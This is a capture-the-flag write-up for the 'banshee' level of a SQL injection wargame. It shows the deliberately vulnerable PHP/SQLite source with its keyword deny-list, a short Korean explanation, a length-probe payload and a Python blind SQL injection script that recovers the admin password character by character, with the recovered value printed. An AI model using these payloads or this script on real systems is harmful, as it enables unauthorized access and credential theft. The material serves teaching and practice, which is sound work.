LOS Lv.39 banshee
banshee
query : select id from member where id='admin' and pw=''
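<?php
// LOS Lv.39 "banshee": challenge source as shown in the writeup.
// The string-built SQLite query below is the level's intended weakness;
// the comments separate what is deliberate from what is merely sloppy.
include "./config.php";
login_chk();
$db = sqlite_open("./db/banshee.db");

// Read the parameter once and default to '' so a request without ?pw=
// does not raise an undefined-index notice. The original used the
// unquoted constant $_GET[pw], which PHP falls back to the string 'pw'
// (with a notice) — same index, so behaviour is unchanged.
$pw = isset($_GET['pw']) ? $_GET['pw'] : '';

// Deny-list filter: case-insensitively rejects the substrings
// "sqlite", "member" and "_". Rejecting a few keywords is not
// escaping or parameterization, which is why the query stays injectable.
if(preg_match('/sqlite|member|_/i', $pw)) exit("No Hack ~_~");

// Deliberate injection point of the challenge: $pw is interpolated
// straight into the SQL. Outside a challenge this must be a prepared
// statement (PDO) or, with this legacy extension, sqlite_escape_string().
$query = "select id from member where id='admin' and pw='{$pw}'";

// The query text is reflected into the page; escape it so the same
// parameter cannot also inject HTML/script into the response.
echo "<hr>query : <strong>" . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . "</strong><hr><br>";

// Any returned row with a non-empty id prints the success marker. That
// one-bit output is the only feedback the query gives the client.
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>login success!</h2>";

// The flag is granted only when the submitted value is strictly equal to
// admin's stored pw, so the marker above alone does not clear the level.
$query = "select pw from member where id='admin'";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['pw'] === $pw) solve("banshee");
highlight_file(__FILE__);
?>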
Solution
sqlite의 information_schema 역할을 하는 sqlite_master에서
값을 뽑아오고 싶었는데, 필터(`sqlite`, `member`, `_`)에 걸려서 불가능함.
blind sql injection으로 풀면 됨.
?pw=' or id='admin' and length(pw)=8 --%20
import requests

# Writeup script for LOS Lv.39 "banshee": recovers admin's 8-character pw
# one position at a time through the page's "login success!" marker.
# Each probe asks whether hex(substr(pw, i, 1)) equals one candidate
# character; the marker's presence in the response answers yes/no.
# Defender's view: this is at most 8 * 75 = 600 near-identical requests
# to one endpoint, differing only in the pw parameter — a pattern that
# is straightforward to rate-limit or alert on.
url = 'https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'PHPSESSID': '[redacted]'}

PW_LENGTH = 8                 # established earlier with the length(pw)=8 probe
CANDIDATES = range(48, 123)   # ASCII '0' .. 'z'
PROBE = "' or id='admin' and hex(substr(pw,{},1))=hex('{}') --"
SUCCESS_MARKER = "<h2>login success!</h2>"

pw = ''
for position in range(1, PW_LENGTH + 1):
    for code in CANDIDATES:
        candidate = chr(code)
        params = {'pw': PROBE.format(position, candidate)}
        res = requests.get(url, headers=headers, params=params, cookies=cookies)
        if SUCCESS_MARKER in res.text:
            pw += candidate
            print("pw : " + pw)  # 0313091b
            break
print("BANSHEE Clear!")